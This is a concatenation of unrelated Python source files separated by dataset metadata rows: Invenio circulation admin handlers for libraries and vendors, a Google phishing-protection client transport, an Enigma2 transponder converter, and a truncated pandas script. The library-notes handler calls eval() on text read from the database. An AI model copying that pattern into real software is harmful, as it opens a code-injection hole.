ill_req = db.search_ill_requests_title(p, date_from, date_to)
body = bc_templates.tmpl_list_ill(ill_req=ill_req, ln=ln)
elif f == 'ILL_request_ID':
ill_req = db.search_ill_requests_id(p, date_from, date_to)
body = bc_templates.tmpl_list_ill(ill_req=ill_req, ln=ln)
elif f == 'cost':
purchase_reqs = db.search_requests_cost(p, date_from, date_to)
body = bc_templates.tmpl_list_purchase(purchase_reqs=purchase_reqs, ln=ln)
elif f == 'notes':
purchase_reqs = db.search_requests_notes(p, date_from, date_to)
body = bc_templates.tmpl_list_purchase(purchase_reqs=purchase_reqs, ln=ln)
return page(title=_("List of ILL requests"),
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
###
### "Library" related templates ###
###
def get_library_details(req, library_id, ln=CFG_SITE_LANG):
"""
Display the details of a library.
@type library_id: integer.
@param library_id: identify the library. It is also the primary key of
the table crcLIBRARY.
@return: library details.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
navtrail_previous_links = '<a class="navtrail" ' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
library_details = db.get_library_details(library_id)
if library_details is None:
_ = gettext_set_language(ln)
infos = []
infos.append(_('Library ID not found.'))
return search_library_step1(req, infos, ln)
library_items = db.get_library_items(library_id)
body = bc_templates.tmpl_library_details(library_details=library_details,
library_items=library_items,
ln=ln)
return page(title=_("Library details"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def merge_libraries_step1(req, library_id, f=None, p=None, ln=CFG_SITE_LANG):
"""
Step 1/3 of library merging procedure
@param library_id: ID of the library to be deleted
@param p: search pattern.
@param f: field
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
navtrail_previous_links = '<a class="navtrail" ' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
library_details = db.get_library_details(library_id)
library_items = db.get_library_items(library_id)
result = None
if f is not None:
if p in (None, '', '*'):
result = db.get_all_libraries() #list of (id, name)
elif f == 'name':
result = db.search_library_by_name(p)
elif f == 'email':
result = db.search_library_by_email(p)
body = bc_templates.tmpl_merge_libraries_step1(
library_details=library_details,
library_items=library_items,
result=result,
p=p,
ln=ln)
return page(title=_("Merge libraries"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def merge_libraries_step2(req, library_from, library_to, ln=CFG_SITE_LANG):
"""
Step 2/3 of library merging procedure
Confirm the libraries selected
@param library_from: ID of the library to be deleted
@param library_to: ID of the resulting library
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
navtrail_previous_links = '<a class="navtrail" ' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
library_from_details = db.get_library_details(library_from)
library_from_items = db.get_library_items(library_from)
library_to_details = db.get_library_details(library_to)
library_to_items = db.get_library_items(library_to)
body = bc_templates.tmpl_merge_libraries_step2(
library_from_details=library_from_details,
library_from_items=library_from_items,
library_to_details=library_to_details,
library_to_items=library_to_items,
ln=ln)
return page(title=_("Merge libraries"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def merge_libraries_step3(req, library_from, library_to, ln=CFG_SITE_LANG):
"""
Step 3/3 of library merging procedure
Perform the merge and display the details of the resulting library
@param library_from: ID of the library to be deleted
@param library_to: ID of the resulting library
"""
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
db.merge_libraries(library_from, library_to)
return get_library_details(req, library_to, ln)
def add_new_library_step1(req, ln=CFG_SITE_LANG):
"""
Add a new Library.
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
body = bc_templates.tmpl_add_new_library_step1(ln=ln)
return page(title=_("Add new library"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_library_step2(req, name, email, phone, address,
lib_type, notes, ln=CFG_SITE_LANG):
"""
Add a new Library.
"""
tup_infos = (name, email, phone, address, lib_type, notes)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
_ = gettext_set_language(ln)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
body = bc_templates.tmpl_add_new_library_step2(tup_infos=tup_infos, ln=ln)
return page(title=_("Add new library"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_library_step3(req, name, email, phone, address,
lib_type, notes, ln=CFG_SITE_LANG):
"""
Add a new Library.
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
db.add_new_library(name, email, phone, address, lib_type, notes)
body = bc_templates.tmpl_add_new_library_step3(ln=ln)
return page(title=_("Add new library"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_library_info_step1(req, ln=CFG_SITE_LANG):
"""
Update the library's information.
"""
infos = []
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
body = bc_templates.tmpl_update_library_info_step1(infos=infos, ln=ln)
return page(title=_("Update library information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_library_info_step2(req, column, string, ln=CFG_SITE_LANG):
"""
Update the library's information.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if not string:
infos = []
infos.append(_("Empty string.") + ' ' + _('Please, try again.'))
body = bc_templates.tmpl_update_library_info_step1(infos=infos, ln=ln)
elif string == '*':
result = db.get_all_libraries()
body = bc_templates.tmpl_update_library_info_step2(result=result, ln=ln)
else:
if column == 'name':
result = db.search_library_by_name(string)
else:
result = db.search_library_by_email(string)
body = bc_templates.tmpl_update_library_info_step2(result=result, ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=_("Update library information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_library_info_step3(req, library_id, ln=CFG_SITE_LANG):
"""
Update the library's information.
library_id - identify the library. It is also the primary key of
the table crcLIBRARY.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
library_info = db.get_library_details(library_id)
body = bc_templates.tmpl_update_library_info_step3(
library_info=library_info,
ln=ln)
return page(title=_("Update library information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_library_info_step4(req, name, email, phone, address, lib_type,
library_id, ln=CFG_SITE_LANG):
"""
Update the library's information.
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
tup_infos = (library_id, name, email, phone, address, lib_type)
body = bc_templates.tmpl_update_library_info_step4(tup_infos=tup_infos,
ln=ln)
return page(title=_("Update library information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_library_info_step5(req, name, email, phone, address, lib_type,
library_id, ln=CFG_SITE_LANG):
"""
Update the library's information.
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
#(library_id, name, email, phone, address) = tup_infos
db.update_library_info(library_id, name, email, phone, address, lib_type)
body = bc_templates.tmpl_update_library_info_step5(ln=ln)
return page(title=_("Update library information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_library_notes(req, library_id, delete_key,
library_notes, ln=CFG_SITE_LANG):
"""
Retrieve notes related with a library.
library_id - identify the library. It is also the primary key of
the table crcLIBRARY.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if delete_key and library_id:
if looks_like_dictionary(db.get_library_notes(library_id)):
lib_notes = eval(db.get_library_notes(library_id))
if delete_key in lib_notes.keys():
del lib_notes[delete_key]
db.update_library_notes(library_id, lib_notes)
elif library_notes:
if db.get_library_notes(library_id):
if looks_like_dictionary(db.get_library_notes(library_id)):
lib_notes = eval(db.get_library_notes(library_id))
else:
lib_notes = {}
else:
lib_notes = {}
lib_notes[time.strftime("%Y-%m-%d %H:%M:%S")] = str(library_notes)
db.update_library_notes(library_id, lib_notes)
lib_notes = db.get_library_notes(library_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
body = bc_templates.tmpl_library_notes(library_notes=lib_notes,
library_id=library_id,
ln=ln)
return page(title=_("Library notes"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def search_library_step1(req, infos=[], ln=CFG_SITE_LANG):
"""
Display the form where we can search a library (by name or email).
"""
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
body = bc_templates.tmpl_search_library_step1(infos=infos,
ln=ln)
return page(title=_("Search library"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def search_library_step2(req, column, string, ln=CFG_SITE_LANG):
"""
Search a library and return a list with all the possible results, using the
parameters received from the previous step.
column - identify the column, of the table crcLIBRARY, that will be
considered during the search. Can be 'name' or 'email'.
str - string used for the search process.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if not string:
infos = []
infos.append(_("Emptry string.") + ' ' + _('Please, try again.'))
body = bc_templates.tmpl_search_library_step1(infos=infos, ln=ln)
elif string == '*':
result = db.get_all_libraries()
body = bc_templates.tmpl_search_library_step2(result=result, ln=ln)
else:
if column == 'name':
result = db.search_library_by_name(string)
else:
result = db.search_library_by_email(string)
body = bc_templates.tmpl_search_library_step2(result=result, ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
return page(title=_("Search library"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
###
### "Vendor" related templates ###
###
def get_vendor_details(req, vendor_id, ln=CFG_SITE_LANG):
"""
Display the details of a vendor.
@type vendor_id: integer.
@param vendor_id: identify the vendor. It is also the primary key of
the table crcVENDOR.
@return: vendor details.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
vendor_details = db.get_vendor_details(vendor_id)
navtrail_previous_links = '<a class="navtrail" ' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_vendor_details(vendor_details=vendor_details,
ln=ln)
return page(title=_("Vendor details"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_vendor_step1(req, ln=CFG_SITE_LANG):
"""
Add a new Vendor.
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
body = bc_templates.tmpl_add_new_vendor_step1(ln=ln)
return page(title=_("Add new vendor"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_vendor_step2(req, name, email, phone, address,
notes, ln=CFG_SITE_LANG):
"""
Add a new Vendor.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
tup_infos = (name, email, phone, address, notes)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_add_new_vendor_step2(tup_infos=tup_infos, ln=ln)
return page(title=_("Add new vendor"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_vendor_step3(req, name, email, phone, address,
notes, ln=CFG_SITE_LANG):
"""
Add a new Vendor.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
db.add_new_vendor(name, email, phone, address, notes)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_add_new_vendor_step3(ln=ln)
return page(title=_("Add new vendor"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_vendor_info_step1(req, ln=CFG_SITE_LANG):
"""
Update the vendor's information.
"""
infos = []
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
_ = gettext_set_language(ln)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
body = bc_templates.tmpl_update_vendor_info_step1(infos=infos, ln=ln)
return page(title=_("Update vendor information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_vendor_info_step2(req, column, string, ln=CFG_SITE_LANG):
"""
Update the vendor's information.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if not string:
infos = []
infos.append(_('Empty string.') + ' ' + _('Please, try again.'))
body = bc_templates.tmpl_update_vendor_info_step1(infos=infos, ln=ln)
elif string == '*':
result = db.get_all_vendors()
body = bc_templates.tmpl_update_vendor_info_step2(result=result, ln=ln)
else:
if column == 'name':
result = db.search_vendor_by_name(string)
else:
result = db.search_vendor_by_email(string)
body = bc_templates.tmpl_update_vendor_info_step2(result=result, ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_update_vendor_info_step2(result=result, ln=ln)
return page(title=_("Update vendor information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_vendor_info_step3(req, vendor_id, ln=CFG_SITE_LANG):
"""
Update the library's information.
vendor_id - identify the vendor. It is also the primary key of
the table crcVENDOR.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
vendor_info = db.get_vendor_details(vendor_id)
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_update_vendor_info_step3(vendor_info=vendor_info,
ln=ln)
return page(title=_("Update vendor information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_vendor_info_step4(req, name, email, phone, address,
vendor_id, ln=CFG_SITE_LANG):
"""
Update the vendor's information.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
tup_infos = (vendor_id, name, email, phone, address)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_update_vendor_info_step4(tup_infos=tup_infos,
ln=ln)
return page(title=_("Update vendor information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_vendor_info_step5(req, name, email, phone, address,
vendor_id, ln=CFG_SITE_LANG):
"""
Update the library's information.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
db.update_vendor_info(vendor_id, name, email, phone, address)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_update_vendor_info_step5(ln=ln)
return page(title=_("Update vendor information"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_vendor_notes(req, vendor_id, add_notes, new_note, ln=CFG_SITE_LANG):
"""
Retrieve notes related with a vendor.
vendor_id - identify the vendor. It is also the primary key of
the table crcVENDOR.
@param add_notes: display the textarea where will be written a new notes.
@param new_notes: note that will be added to the others vendor's notes.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if new_note:
date = '[' + time.ctime() + '] '
new_line = '\n'
new_note = date + new_note + new_line
db.add_new_vendor_note(new_note, vendor_id)
vendor_notes = db.get_vendor_notes(vendor_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_vendor_notes(vendor_notes=vendor_notes,
vendor_id=vendor_id,
add_notes=add_notes,
ln=ln)
return page(title=_("Vendor notes"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def search_vendor_step1(req, ln=CFG_SITE_LANG):
"""
Display the form where we can search a vendor (by name or email).
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_search_vendor_step1(infos=infos,
ln=ln)
return page(title=_("Search vendor"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def search_vendor_step2(req, column, string, ln=CFG_SITE_LANG):
"""
Search a vendor and return a list with all the possible results, using the
parameters received from the previous step.
column - identify the column, of the table crcVENDOR, that will be
considered during the search. Can be 'name' or 'email'.
str - string used for the search process.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if not string:
infos = []
infos.append(_('Empty string.') + ' ' + _('Please, try again.'))
body = bc_templates.tmpl_search_vendor_step1(infos=infos,
ln=ln)
elif string == '*':
result = db.get_all_vendors()
body = bc_templates.tmpl_search_vendor_step2(result=result, ln=ln)
else:
if column == 'name':
result = db.search_vendor_by_name(string)
else:
result = db.search_vendor_by_email(string)
body = bc_templates.tmpl_search_vendor_step2(result=result, ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=_("Search vendor"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
|
gpl-2.0
| 8,329,778,068,518,806,000
| 37.514354
| 347
| 0.521028
| false
| 3.899847
| false
| false
| false
|
googleapis/python-phishingprotection
|
google/cloud/phishingprotection_v1beta1/services/phishing_protection_service_v1_beta1/transports/base.py
|
1
|
6953
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from typing import Awaitable, Callable, Dict, Optional, Sequence, Union
import packaging.version
import pkg_resources
import google.auth # type: ignore
import google.api_core # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.phishingprotection_v1beta1.types import phishingprotection
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-phishingprotection",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
try:
# google.auth.__version__ was added in 1.26.0
_GOOGLE_AUTH_VERSION = google.auth.__version__
except AttributeError:
try: # try pkg_resources if it is available
_GOOGLE_AUTH_VERSION = pkg_resources.get_distribution("google-auth").version
except pkg_resources.DistributionNotFound: # pragma: NO COVER
_GOOGLE_AUTH_VERSION = None
class PhishingProtectionServiceV1Beta1Transport(abc.ABC):
"""Abstract transport class for PhishingProtectionServiceV1Beta1."""
AUTH_SCOPES = ("https://www.googleapis.com/auth/cloud-platform",)
DEFAULT_HOST: str = "phishingprotection.googleapis.com"
def __init__(
self,
*,
host: str = DEFAULT_HOST,
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ":" not in host:
host += ":443"
self._host = host
scopes_kwargs = self._get_scopes_kwargs(self._host, scopes)
# Save the scopes.
self._scopes = scopes
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise core_exceptions.DuplicateCredentialArgs(
"'credentials_file' and 'credentials' are mutually exclusive"
)
if credentials_file is not None:
credentials, _ = google.auth.load_credentials_from_file(
credentials_file, **scopes_kwargs, quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = google.auth.default(
**scopes_kwargs, quota_project_id=quota_project_id
)
# If the credentials is service account credentials, then always try to use self signed JWT.
if (
always_use_jwt_access
and isinstance(credentials, service_account.Credentials)
and hasattr(service_account.Credentials, "with_always_use_jwt_access")
):
credentials = credentials.with_always_use_jwt_access(True)
# Save the credentials.
self._credentials = credentials
# TODO(busunkim): This method is in the base transport
# to avoid duplicating code across the transport classes. These functions
# should be deleted once the minimum required versions of google-auth is increased.
# TODO: Remove this function once google-auth >= 1.25.0 is required
@classmethod
def _get_scopes_kwargs(
cls, host: str, scopes: Optional[Sequence[str]]
) -> Dict[str, Optional[Sequence[str]]]:
"""Returns scopes kwargs to pass to google-auth methods depending on the google-auth version"""
scopes_kwargs = {}
if _GOOGLE_AUTH_VERSION and (
packaging.version.parse(_GOOGLE_AUTH_VERSION)
>= packaging.version.parse("1.25.0")
):
scopes_kwargs = {"scopes": scopes, "default_scopes": cls.AUTH_SCOPES}
else:
scopes_kwargs = {"scopes": scopes or cls.AUTH_SCOPES}
return scopes_kwargs
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.report_phishing: gapic_v1.method.wrap_method(
self.report_phishing, default_timeout=600.0, client_info=client_info,
),
}
@property
def report_phishing(
self,
) -> Callable[
[phishingprotection.ReportPhishingRequest],
Union[
phishingprotection.ReportPhishingResponse,
Awaitable[phishingprotection.ReportPhishingResponse],
],
]:
raise NotImplementedError()
__all__ = ("PhishingProtectionServiceV1Beta1Transport",)
|
apache-2.0
| -7,155,690,963,816,367,000
| 38.731429
| 103
| 0.65238
| false
| 4.25
| false
| false
| false
|
oostende/openblachole
|
lib/python/Components/Converter/TransponderInfo.py
|
2
|
2843
|
# -*- coding: utf-8 -*-
from Components.Converter.Converter import Converter
from enigma import iServiceInformation, iPlayableService, iPlayableServicePtr, eServiceCenter
from Components.Element import cached
from ServiceReference import resolveAlternate, ServiceReference
from Tools.Transponder import ConvertToHumanReadable, getChannelNumber
from Components.NimManager import nimmanager
import Screens.InfoBar
class TransponderInfo(Converter, object):
def __init__(self, type):
Converter.__init__(self, type)
self.type = type.split(";")
@cached
def getText(self):
service = self.source.service
if isinstance(service, iPlayableServicePtr):
info = service and service.info()
ref = None
else: # reference
info = service and self.source.info
ref = service
if not info:
return ""
if ref:
nref = resolveAlternate(ref)
if nref:
ref = nref
info = eServiceCenter.getInstance().info(ref)
transponderraw = info.getInfoObject(ref, iServiceInformation.sTransponderData)
else:
transponderraw = info.getInfoObject(iServiceInformation.sTransponderData)
if "InRootOnly" in self.type and not self.rootBouquet():
return ""
if "NoRoot" in self.type and self.rootBouquet():
return ""
if transponderraw:
transponderdata = ConvertToHumanReadable(transponderraw)
if not transponderdata["system"]:
transponderdata["system"] = transponderraw.get("tuner_type", "None")
if not transponderdata["system"]:
return ""
if "DVB-T" in transponderdata["system"]:
return "%s %s %s %s" % (transponderdata["system"], transponderdata["channel"], transponderdata["frequency"], transponderdata["bandwidth"])
elif "DVB-C" in transponderdata["system"]:
return "%s %s %s %s %s" % (transponderdata["system"], transponderdata["frequency"], transponderdata["symbol_rate"], transponderdata["fec_inner"], \
transponderdata["modulation"])
return "%s %s %s %s %s %s %s" % (transponderdata["system"], transponderdata["frequency"], transponderdata["polarization_abbreviation"], transponderdata["symbol_rate"], \
transponderdata["fec_inner"], transponderdata["modulation"], transponderdata["detailed_satpos" in self.type and "orbital_position" or "orb_pos"])
if ref:
result = ref.toString().replace("%3a",":")
else:
result = info.getInfoString(iServiceInformation.sServiceref)
if "://" in result:
return _("Stream") + " " + result.rsplit("://", 1)[1].split("/")[0]
return ""
text = property(getText)
def rootBouquet(self):
servicelist = Screens.InfoBar.InfoBar.instance.servicelist
epg_bouquet = servicelist and servicelist.getRoot()
if ServiceReference(epg_bouquet).getServiceName():
return False
return True
def changed(self, what):
if what[0] != self.CHANGED_SPECIFIC or what[1] in (iPlayableService.evStart,):
Converter.changed(self, what)
|
gpl-2.0
| -3,631,324,653,382,697,500
| 39.042254
| 172
| 0.724938
| false
| 3.392601
| false
| false
| false
|
Maplenormandy/list-62x
|
python/dataProcessing/generatePlots.py
|
1
|
1362
|
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from statsmodels.stats.weightstats import ttost_paired
data = pd.read_csv(open('combined_data.csv'))
for t in data.index:
if int(data.loc[t, 'Baseline']) == 0:
data.loc[t, 'STF Baseline'] = data.loc[t, 'Succesfully Tracked Features 0']
data.loc[t, 'STF Experiment'] = data.loc[t, 'Succesfully Tracked Features 1']
else:
